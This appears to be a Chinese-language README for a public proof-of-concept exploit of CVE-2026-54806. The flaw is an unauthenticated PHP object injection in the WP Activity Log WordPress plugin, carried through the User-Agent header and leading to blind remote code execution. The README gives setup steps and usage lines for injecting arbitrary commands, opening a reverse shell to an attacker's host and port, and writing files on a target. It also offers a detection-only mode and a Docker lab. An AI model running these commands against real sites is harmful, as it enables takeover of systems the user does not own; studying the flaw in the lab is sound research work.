CVE-2026-54806 是 Melapress 开发的 WP Activity Log WordPress 插件(wp-security-audit-log)中一个严重的(CVSS 9.8)未认证 PHP 对象注入漏洞。未认证的攻击者可以在任何触发日志事件(例如登录失败)的请求中,通过 User-Agent 头注入序列化的 PHP 对象。注入的载荷会存储在数据库中,当管理员访问 WordPress 仪表盘时会被无限制地反序列化,从而实现盲远程代码执行(不会向攻击者返回任何输出)。
受影响插件: WP Activity Log <= 5.6.3.1(已在 5.6.4 中修复)
RCE 所需条件: WordPress 6.4.0 - 6.4.1 — 此 PoC 使用 WP_HTML_Token gadget,这是唯一一个所有属性均为公有的 WP 核心链,能够通过 sanitize_text_field() 并符合 255 字符的列限制。
--check 进行非破坏性检测--command 注入命令--shell 注入反弹 Shell--write-file 写入文件git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>
自包含实验环境,包含 WordPress 6.4.1 + WP Activity Log 5.6.3.1。详情请查看 DOCKER.md。
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check
该实验环境包含一个 admin-bot,每 60 秒访问一次仪表盘,因此注入的载荷会自动触发——无需手动交互。
本工具仅用于教育和研究目的。创建者不对因使用本工具而造成的任何误用或损害承担责任。